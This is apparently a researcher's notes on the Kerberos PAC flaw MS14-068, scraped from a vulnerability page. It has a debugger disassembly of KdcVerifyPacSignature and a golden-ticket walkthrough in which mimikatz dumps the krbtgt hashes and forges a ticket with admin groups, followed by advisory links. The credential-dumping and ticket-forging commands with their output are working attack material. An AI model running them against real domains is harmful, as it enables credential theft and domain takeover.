63a89035 6a0f push 0Fh
63a89037 33db xor ebx,ebx
63a89039 8945a8 mov dword ptr [ebp-58h],eax
63a8903c 59 pop ecx
63a8903d ff7510 push dword ptr [ebp+10h]
63a89040 66899d58ffffff mov word ptr [ebp-0A8h],bx
63a89047 33c0 xor eax,eax
63a89049 8dbd5affffff lea edi,[ebp-0A6h]
63a8904f f3ab rep stos dword ptr es:[edi]
63a89051 56 push esi
63a89052 8975b0 mov dword ptr [ebp-50h],esi
63a89055 895dbc mov dword ptr [ebp-44h],ebx
63a89058 895db8 mov dword ptr [ebp-48h],ebx
63a8905b 895db4 mov dword ptr [ebp-4Ch],ebx
63a8905e 66ab stos word ptr es:[edi]
63a89060 e81feeffff call KDCSVC!PAC_UnMarshal (63a87e84)
63a89065 85c0 test eax,eax
63a89067 0f84178d0000 je KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x5a:
63a8906d 8d8558ffffff lea eax,[ebp-0A8h]
63a89073 50 push eax
63a89074 b92810ab63 mov ecx,offset KDCSVC!SecData (63ab1028)
63a89079 e8668bffff call KDCSVC!CSecurityData::GetKrbtgtTicketInfo (63a81be4)
63a8907e 3bc3 cmp eax,ebx
63a89080 8945bc mov dword ptr [ebp-44h],eax
63a89083 0f856c8c0000 jne KDCSVC!KdcVerifyPacSignature+0x72 (63a91cf5)
KDCSVC!KdcVerifyPacSignature+0x7d:
63a89089 53 push ebx
63a8908a 6a06 push 6
63a8908c 56 push esi
63a8908d e846ecffff call KDCSVC!PAC_Find (63a87cd8)
63a89092 8bd8 mov ebx,eax
63a89094 85db test ebx,ebx
63a89096 0f8488010000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x90:
63a8909c 8b4b04 mov ecx,dword ptr [ebx+4]
63a8909f 83f904 cmp ecx,4
63a890a2 0f827c010000 jb KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x9c:
63a890a8 8b4308 mov eax,dword ptr [ebx+8]
63a890ab 83c1fc add ecx,0FFFFFFFCh
63a890ae 8d5004 lea edx,[eax+4]
63a890b1 894598 mov dword ptr [ebp-68h],eax
63a890b4 8bc1 mov eax,ecx
63a890b6 c1e902 shr ecx,2
63a890b9 8bf2 mov esi,edx
63a890bb 8d7de8 lea edi,[ebp-18h]
63a890be f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a890c0 8bc8 mov ecx,eax
63a890c2 83e103 and ecx,3
63a890c5 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
63a890c7 8b4b04 mov ecx,dword ptr [ebx+4]
63a890ca 83e904 sub ecx,4
63a890cd 8bfa mov edi,edx
63a890cf 8bd1 mov edx,ecx
63a890d1 c1e902 shr ecx,2
63a890d4 33c0 xor eax,eax
63a890d6 f3ab rep stos dword ptr es:[edi]
63a890d8 6a00 push 0
63a890da 8bca mov ecx,edx
63a890dc 6a07 push 7
63a890de ff75b0 push dword ptr [ebp-50h]
63a890e1 83e103 and ecx,3
63a890e4 f3aa rep stos byte ptr es:[edi]
63a890e6 e8edebffff call KDCSVC!PAC_Find (63a87cd8)
63a890eb 85c0 test eax,eax
63a890ed 89459c mov dword ptr [ebp-64h],eax
63a890f0 0f842e010000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0xea:
63a890f6 8b5004 mov edx,dword ptr [eax+4]
63a890f9 83fa04 cmp edx,4
63a890fc 0f8222010000 jb KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0xf6:
63a89102 8b4808 mov ecx,dword ptr [eax+8]
63a89105 8d7104 lea esi,[ecx+4]
63a89108 894da0 mov dword ptr [ebp-60h],ecx
63a8910b 8d4afc lea ecx,[edx-4]
63a8910e 8bd1 mov edx,ecx
63a89110 c1e902 shr ecx,2
63a89113 ff7510 push dword ptr [ebp+10h]
63a89116 8975a4 mov dword ptr [ebp-5Ch],esi
63a89119 ff75b0 push dword ptr [ebp-50h]
63a8911c 8d7dc0 lea edi,[ebp-40h]
63a8911f f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a89121 8bca mov ecx,edx
63a89123 83e103 and ecx,3
63a89126 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
63a89128 8b4804 mov ecx,dword ptr [eax+4]
63a8912b 8b7da4 mov edi,dword ptr [ebp-5Ch]
63a8912e 83e904 sub ecx,4
63a89131 8bd1 mov edx,ecx
63a89133 c1e902 shr ecx,2
63a89136 33c0 xor eax,eax
63a89138 f3ab rep stos dword ptr es:[edi]
63a8913a 8bca mov ecx,edx
63a8913c 83e103 and ecx,3
63a8913f f3aa rep stos byte ptr es:[edi]
63a89141 e810e5ffff call KDCSVC!PAC_ReMarshal (63a87656)
63a89146 84c0 test al,al
63a89148 0f84d6000000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x142:
63a8914e 8d45b8 lea eax,[ebp-48h]
63a89151 50 push eax
63a89152 8b4598 mov eax,dword ptr [ebp-68h]
63a89155 ff30 push dword ptr [eax]
63a89157 e8538affff call KDCSVC!CDLocateCheckSum (63a81baf)
63a8915c 85c0 test eax,eax
63a8915e 0f8ce38b0000 jl KDCSVC!KdcVerifyPacSignature+0x224 (63a91d47)
KDCSVC!KdcVerifyPacSignature+0x158:
63a89164 8b55b8 mov edx,dword ptr [ebp-48h]
63a89167 837a0414 cmp dword ptr [edx+4],14h // DEBUG HERE IS THE ORIGINAL PATCH
63a8916b 0f87138c0000 ja KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x165:
63a89171 8b4a20 mov ecx,dword ptr [edx+20h]
63a89174 85c9 test ecx,ecx
63a89176 8d45b4 lea eax,[ebp-4Ch]
63a89179 50 push eax
63a8917a 6a11 push 11h
63a8917c 0f857e8b0000 jne KDCSVC!KdcVerifyPacSignature+0x172 (63a91d00)
KDCSVC!KdcVerifyPacSignature+0x183:
63a89182 8b45ac mov eax,dword ptr [ebp-54h]
63a89185 ff7004 push dword ptr [eax+4]
63a89188 ff7008 push dword ptr [eax+8]
63a8918b ff521c call dword ptr [edx+1Ch]
KDCSVC!KdcVerifyPacSignature+0x18f:
63a8918e 85c0 test eax,eax
63a89190 0f8cee8b0000 jl KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x197:
63a89196 ff75b0 push dword ptr [ebp-50h]
63a89199 8b45b8 mov eax,dword ptr [ebp-48h]
63a8919c ff7510 push dword ptr [ebp+10h]
63a8919f ff75b4 push dword ptr [ebp-4Ch]
63a891a2 ff5010 call dword ptr [eax+10h]
63a891a5 8d45d4 lea eax,[ebp-2Ch]
63a891a8 50 push eax
63a891a9 ff75b4 push dword ptr [ebp-4Ch]
63a891ac 8b45b8 mov eax,dword ptr [ebp-48h]
63a891af ff5014 call dword ptr [eax+14h]
63a891b2 8d45b4 lea eax,[ebp-4Ch]
63a891b5 50 push eax
63a891b6 8b45b8 mov eax,dword ptr [ebp-48h]
63a891b9 ff5018 call dword ptr [eax+18h]
63a891bc 8b45b8 mov eax,dword ptr [ebp-48h]
63a891bf 8b4804 mov ecx,dword ptr [eax+4]
63a891c2 8b4304 mov eax,dword ptr [ebx+4]
63a891c5 83e804 sub eax,4
63a891c8 3bc8 cmp ecx,eax
63a891ca 754e jne KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)
KDCSVC!KdcVerifyPacSignature+0x1d1:
63a891cc 8d7de8 lea edi,[ebp-18h]
63a891cf 8d75d4 lea esi,[ebp-2Ch]
63a891d2 33c0 xor eax,eax
63a891d4 f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
63a891d6 7542 jne KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)
KDCSVC!KdcVerifyPacSignature+0x1e1:
63a891d8 8b45a8 mov eax,dword ptr [ebp-58h]
63a891db 817820f6010000 cmp dword ptr [eax+20h],1F6h
63a891e2 0f852c8b0000 jne KDCSVC!KdcVerifyPacSignature+0x1f1 (63a91d14)
KDCSVC!KdcVerifyPacSignature+0x2ee:
63a891e8 837dbc29 cmp dword ptr [ebp-44h],29h
63a891ec 0f841e8c0000 je KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)
KDCSVC!KdcVerifyPacSignature+0x340:
63a891f2 837db400 cmp dword ptr [ebp-4Ch],0
63a891f6 5f pop edi
63a891f7 5e pop esi
63a891f8 5b pop ebx
63a891f9 0f85668c0000 jne KDCSVC!KdcVerifyPacSignature+0x349 (63a91e65)
KDCSVC!KdcVerifyPacSignature+0x357:
63a891ff 8d8558ffffff lea eax,[ebp-0A8h]
63a89205 50 push eax
63a89206 e8498cffff call KDCSVC!FreeTicketInfo (63a81e54)
63a8920b 8b4dfc mov ecx,dword ptr [ebp-4]
63a8920e 8b45bc mov eax,dword ptr [ebp-44h]
63a89211 e83f89ffff call KDCSVC!__security_check_cookie (63a81b55)
63a89216 c9 leave
63a89217 c21000 ret 10h
KDCSVC!KdcVerifyPacSignature+0x2ba:
63a8921a 683092a863 push offset KDCSVC!`string' (63a89230)
63a8921f e9bb8b0000 jmp KDCSVC!KdcVerifyPacSignature+0x2bf (63a91ddf)
KDCSVC!KdcVerifyPacSignature+0x2d1:
63a89224 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a8922b e9c18b0000 jmp KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)
KDCSVC!KdcVerifyPacSignature+0x72:
63a91cf5 50 push eax
63a91cf6 e884120100 call KDCSVC!KerbMapKerbError (63aa2f7f)
63a91cfb e9f1000000 jmp KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)
KDCSVC!KdcVerifyPacSignature+0x172:
63a91d00 8d45e8 lea eax,[ebp-18h]
63a91d03 50 push eax
63a91d04 8b45ac mov eax,dword ptr [ebp-54h]
63a91d07 ff7004 push dword ptr [eax+4]
63a91d0a ff7008 push dword ptr [eax+8]
63a91d0d ffd1 call ecx
63a91d0f e97a74ffff jmp KDCSVC!KdcVerifyPacSignature+0x18f (63a8918e)
KDCSVC!KdcVerifyPacSignature+0x1f1:
63a91d14 f6401c40 test byte ptr [eax+1Ch],40h
63a91d18 0f85ca74ffff jne KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x1fb:
63a91d1e 687bffffff push 0FFFFFF7Bh
63a91d23 ff7584 push dword ptr [ebp-7Ch]
63a91d26 e848fefeff call KDCSVC!KerbGetKeyFromList (63a81b73)
63a91d2b 8bf0 mov esi,eax
63a91d2d 85f6 test esi,esi
63a91d2f 0f84b374ffff je KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x212:
63a91d35 8d45b8 lea eax,[ebp-48h]
63a91d38 50 push eax
63a91d39 8b45a0 mov eax,dword ptr [ebp-60h]
63a91d3c ff30 push dword ptr [eax]
63a91d3e e86cfefeff call KDCSVC!CDLocateCheckSum (63a81baf)
63a91d43 85c0 test eax,eax
63a91d45 7d0c jge KDCSVC!KdcVerifyPacSignature+0x230 (63a91d53)
KDCSVC!KdcVerifyPacSignature+0x224:
63a91d47 c745bc0f000000 mov dword ptr [ebp-44h],0Fh
63a91d4e e99f74ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x230:
63a91d53 8b45b8 mov eax,dword ptr [ebp-48h]
63a91d56 8b4820 mov ecx,dword ptr [eax+20h]
63a91d59 85c9 test ecx,ecx
63a91d5b 7414 je KDCSVC!KdcVerifyPacSignature+0x24e (63a91d71)
KDCSVC!KdcVerifyPacSignature+0x23a:
63a91d5d 8d45b4 lea eax,[ebp-4Ch]
63a91d60 50 push eax
63a91d61 6a11 push 11h
63a91d63 8d45c0 lea eax,[ebp-40h]
63a91d66 50 push eax
63a91d67 ff7604 push dword ptr [esi+4]
63a91d6a ff7608 push dword ptr [esi+8]
63a91d6d ffd1 call ecx
63a91d6f eb0f jmp KDCSVC!KdcVerifyPacSignature+0x25d (63a91d80)
KDCSVC!KdcVerifyPacSignature+0x24e:
63a91d71 8d4db4 lea ecx,[ebp-4Ch]
63a91d74 51 push ecx
63a91d75 6a11 push 11h
63a91d77 ff7604 push dword ptr [esi+4]
63a91d7a ff7608 push dword ptr [esi+8]
63a91d7d ff501c call dword ptr [eax+1Ch]
KDCSVC!KdcVerifyPacSignature+0x25d:
63a91d80 85c0 test eax,eax
63a91d82 7d0c jge KDCSVC!KdcVerifyPacSignature+0x26d (63a91d90)
KDCSVC!KdcVerifyPacSignature+0x261:
63a91d84 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a91d8b e96274ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x26d:
63a91d90 8d45e8 lea eax,[ebp-18h]
63a91d93 50 push eax
63a91d94 8b45b8 mov eax,dword ptr [ebp-48h]
63a91d97 ff7004 push dword ptr [eax+4]
63a91d9a ff75b4 push dword ptr [ebp-4Ch]
63a91d9d ff5010 call dword ptr [eax+10h]
63a91da0 8d45d4 lea eax,[ebp-2Ch]
63a91da3 50 push eax
63a91da4 ff75b4 push dword ptr [ebp-4Ch]
63a91da7 8b45b8 mov eax,dword ptr [ebp-48h]
63a91daa ff5014 call dword ptr [eax+14h]
63a91dad 8d45b4 lea eax,[ebp-4Ch]
63a91db0 50 push eax
63a91db1 8b45b8 mov eax,dword ptr [ebp-48h]
63a91db4 ff5018 call dword ptr [eax+18h]
63a91db7 8b45b8 mov eax,dword ptr [ebp-48h]
63a91dba 8b4804 mov ecx,dword ptr [eax+4]
63a91dbd 8b459c mov eax,dword ptr [ebp-64h]
63a91dc0 8b4004 mov eax,dword ptr [eax+4]
63a91dc3 83e804 sub eax,4
63a91dc6 3bc8 cmp ecx,eax
63a91dc8 7510 jne KDCSVC!KdcVerifyPacSignature+0x2b3 (63a91dda)
KDCSVC!KdcVerifyPacSignature+0x2a7:
63a91dca 8d7dc0 lea edi,[ebp-40h]
63a91dcd 8d75d4 lea esi,[ebp-2Ch]
63a91dd0 33c0 xor eax,eax
63a91dd2 f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
63a91dd4 0f840e74ffff je KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2b3:
63a91dda 687c1ea963 push offset KDCSVC!`string' (63a91e7c)
KDCSVC!KdcVerifyPacSignature+0x2bf:
63a91ddf 6a01 push 1
63a91de1 e89d1effff call KDCSVC!KDCDebugPrint (63a83c83)
63a91de6 59 pop ecx
63a91de7 59 pop ecx
63a91de8 c745bc29000000 mov dword ptr [ebp-44h],29h
63a91def eb1f jmp KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)
KDCSVC!KdcVerifyPacSignature+0x2d8:
63a91df1 ff7510 push dword ptr [ebp+10h]
63a91df4 ff75b0 push dword ptr [ebp-50h]
63a91df7 e85a58ffff call KDCSVC!PAC_ReMarshal (63a87656)
63a91dfc 84c0 test al,al
63a91dfe 0f85e473ffff jne KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2e7:
63a91e04 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a91e0b e9d873ffff jmp KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2f4:
63a91e10 8b75a8 mov esi,dword ptr [ebp-58h]
63a91e13 0fb706 movzx eax,word ptr [esi]
63a91e16 40 inc eax
63a91e17 40 inc eax
63a91e18 50 push eax
63a91e19 e84301ffff call KDCSVC!MIDL_user_allocate (63a81f61)
63a91e1e 8bd8 mov ebx,eax
63a91e20 85db test ebx,ebx
63a91e22 7416 je KDCSVC!KdcVerifyPacSignature+0x31e (63a91e3a)
KDCSVC!KdcVerifyPacSignature+0x308:
63a91e24 0fb70e movzx ecx,word ptr [esi]
63a91e27 8b7604 mov esi,dword ptr [esi+4]
63a91e2a 8bc1 mov eax,ecx
63a91e2c c1e902 shr ecx,2
63a91e2f 8bfb mov edi,ebx
63a91e31 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a91e33 8bc8 mov ecx,eax
63a91e35 83e103 and ecx,3
63a91e38 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
KDCSVC!KdcVerifyPacSignature+0x31e:
63a91e3a 53 push ebx
63a91e3b 6a01 push 1
63a91e3d 8d45bc lea eax,[ebp-44h]
63a91e40 50 push eax
63a91e41 6a04 push 4
63a91e43 68120000c0 push 0C0000012h
63a91e48 6a01 push 1
63a91e4a e8aa550000 call KDCSVC!ReportServiceEvent (63a973f9)
63a91e4f 83c418 add esp,18h
63a91e52 85db test ebx,ebx
63a91e54 0f849873ffff je KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x33a:
63a91e5a 53 push ebx
63a91e5b e84700ffff call KDCSVC!MIDL_user_free (63a81ea7)
63a91e60 e98d73ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x349:
63a91e65 8b45b8 mov eax,dword ptr [ebp-48h]
63a91e68 85c0 test eax,eax
63a91e6a 0f848f73ffff je KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)
KDCSVC!KdcVerifyPacSignature+0x350:
63a91e70 8d4db4 lea ecx,[ebp-4Ch]
63a91e73 51 push ecx
63a91e74 ff5018 call dword ptr [eax+18h]
63a91e77 e98373ffff jmp KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)
[*] Golden attack:
(1) From the AD:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : SMALLBUSINESS / S-1-5-21-1053798420-2132824579-2427655443
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 6375ac5dba2a03b83002ba6e6e96c547 <-- it is what we need!
* WDigest
01 bf816f365e0fac18a06269b62fdec3cd
02 60bcd5b31db779bee316ead3f9f2bdc5
03 052450bedad3c62b6c7ac2e0518cced6
04 bf816f365e0fac18a06269b62fdec3cd
05 60bcd5b31db779bee316ead3f9f2bdc5
06 6b46611bab1bfc37642831eb4c378a3c
07 bf816f365e0fac18a06269b62fdec3cd
08 36d36b240d95960b3280c17f3dbdd4ef
09 36d36b240d95960b3280c17f3dbdd4ef
10 7700dc3feea8de94dfe42fadd189b562
11 cf5dd5487a5bf52ddb92114e11b35258
12 36d36b240d95960b3280c17f3dbdd4ef
13 85c06a5e70ebb4ea9ea94ec741afc3f4
14 cf5dd5487a5bf52ddb92114e11b35258
15 9e215c82295f151f068a61dcfc25df79
16 9e215c82295f151f068a61dcfc25df79
17 2bbe05a083dd57a8db17231355da9ef5
18 d66e91d4fcd16a0e98c16bec14676e06
19 63381fd3a292e6d6c89ced1f6b14e580
20 111ef3e25e5237fea3190ae4924c981c
21 68c6af34d37db9eeed0e32540f60fe3a
22 68c6af34d37db9eeed0e32540f60fe3a
23 207d5247bd7dac0b5100035d0d6ffb6d
24 5db537f6bfc59059821180dc06e18696
25 5db537f6bfc59059821180dc06e18696
26 f8247c1ccff30ab886e699e401c98241
27 03ddbc3697b4eac454c5c8a5746c4165
28 98b8c45c30f3eb9727de422e2ff11429
29 72fed805b12f04991c8326e8664f909f
* Kerberos
Default Salt : SMALLBUSINESS.LOCALkrbtgt
Credentials
des_cbc_md5 : 497f68d05db65be0
des_cbc_crc : 497f68d05db65be0
6375ac5dba2a03b83002ba6e6e96c547
(2) From the machine we’re attacking (user juan):
kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:6375ac5dba2a03b83002ba6e6e96c547
That’s all.
I think the idea is similar to the golden attac, but hopefully we don’t need the
krbtgt key anymore. Even when I can modify the SignatureType, and create RC4
encrypted tickets with different signautres. The key is needed still to encrypt
a ticket.
So, by modifying mimikatz I can easily create different “malformed tickets”. Even
when I can switch the signature mekanism I neeed the krbtgt hash to encrypt the
TGT ticket.
(Hash for DES)
kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:497f68d05db65be0
To check the signature used by ValidationInfo I’m using the next breakoint:
bp 63a89167 “r edx; dd edx L1; kb 4; g”
Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0
blog.beyondtrust.com/a-quick-look-at-ms14-068
blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
marc.info/?l=bugtraq&m=142350249315918&w=2
secunia.com/advisories/62556
www.roguelynn.com/words/explain-like-im-5-kerberos
www.securitytracker.com/id/1031237
www.us-cert.gov/ncas/alerts/TA14-323A
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324
docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-068
www.securityfocus.com/bid/70958